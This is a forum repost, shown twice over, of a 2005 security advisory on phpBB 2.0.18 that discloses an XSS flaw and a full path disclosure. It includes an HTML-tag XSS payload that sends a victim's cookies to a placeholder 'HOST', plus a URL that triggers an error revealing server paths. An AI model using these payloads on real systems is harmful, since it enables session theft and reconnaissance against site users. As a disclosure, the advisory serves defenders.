2005-12-24 22:25:05 by: h4x0r
phpBB 2.0.18 XSS and Full Path Disclosure
Topic : phpBB 2.0.18 XSS and Full Path Disclosure
SecurityAlert Id : 29
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 17.12.2005
Affected Software : phpBB <= 2.0.18
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
d package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
lution for all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
low HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>
Exploit:
<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document cookie)
" X="<B "> H A L O </B>
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen't exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
llow.php on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=416
SecurityAlert Id : 29
SecurityRisk : Low
Remote Exploit : Yes
Local Exploit : No
Exploit Given : Yes
Credit : Maksymilian Arciemowicz
Date : 17.12.2005
Affected Software : phpBB <= 2.0.18
Advisory Text :
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[phpBB 2.0.18 XSS and Full Path Disclosure cXIb8O3.22]
Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 16.12.2005
from securityreason.com TEAM
- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar
d package. phpBB has a user-friendly interface, simple and straightforward administration
panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL
, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so
lution for all web sites.
Contact with author http://www.phpbb.com/about.php.
- --- 1. XSS ---
If in phpbb is Allowed HTML tags "ON" like b,i,u,pre and have you in profile "Always al
low HTML: YES" or are you Guest
that you can use this tags:
<B C=">" onmouseover="alert('SecurityReason.Com')" X="<B "> H E L O </B>
Exploit:
<B C=">" onmouseover="alert(document.location='http://HOST/cookies?'+document cookie)
" X="<B "> H A L O </B>
and have you cookies.
- --- 2. Full Path Disclosure ---
In file admin/admin_disallow.php is
- -25-31---
if( !empty($setmodules) )
{
$filename = basename(__FILE__);
$module['Users']['Disallow'] = append_sid($filename);
return;
}
- -25-31---
function append_sid() dosen't exists. And if you have:
register_globals = On
display_errors = On
Try to go:
http://[HOST]/[DIR]/admin/admin_disallow.php?setmodules=1
- -RESULT ERROR---
Fatal error: Call to undefined function: append_sid() in /www/2018/phpBB2/admin/admin_disa
llow.php on line 28
- -RESULT ERROR---
- --- 3. Greets ---
sp3x
- --- 4.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQFDpDtC3Ke13X/fTO4RAosCAJkBcYRNbHKDGeuwnY1U/WXMhzDnVQCgl39D
/0u14EN2sQAh1Bwu0yvT48Q=
=lsL8
-----END PGP SIGNATURE-----
[Last Modified By h4x0r, at 2005-12-24 22:53:35]
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=416
There is no comment on this article.
